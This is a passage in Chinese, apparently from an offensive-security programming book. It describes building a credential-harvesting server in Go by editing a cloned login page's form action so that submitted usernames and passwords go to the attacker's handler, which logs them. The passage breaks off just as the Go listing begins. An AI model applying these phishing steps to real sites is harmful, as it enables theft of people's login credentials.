Chrome 浏览器进行保存。在练习文件夹中,你会看到一个类似于代码清单 4-7 所示的目录结构。

代码清单 4-7 /ch-4/credential\_harvester/目录列表

public 目录中的文件表示未更改的复制登录站点。需要修改原始登录表单以重定向输入的凭证,然后将其发送给你自己而不是合法服务器。首先,打开 public/index.html 并找到用于 POST 登录请求的元素 form。该元素看起来应该如下所示。

<form name="form" method="post" action="http://127.0.0.1/?\_task=login">

我们需要修改此标记的 action 属性并将其指向服务器。将 action 更改为/login。要记得保存它。该行现在应如下所示。

<form name="form" method="post" action="/login">

要正确渲染登录表单并获取用户名和密码,首先需要将文件放在 public 目录中。然后,需要为/login 编写一个 HandleFunc 来捕获用户名和密码。通过一些详细的日志记录将捕获的凭证存储在文件中。

只需要几十行代码就可以处理所有这些步骤。代码清单 4-8 完整演示了该程序的 实现。

代码清单 4-8 凭证收割服务器(/ch-4/credential harvester/main.go)

package main

import (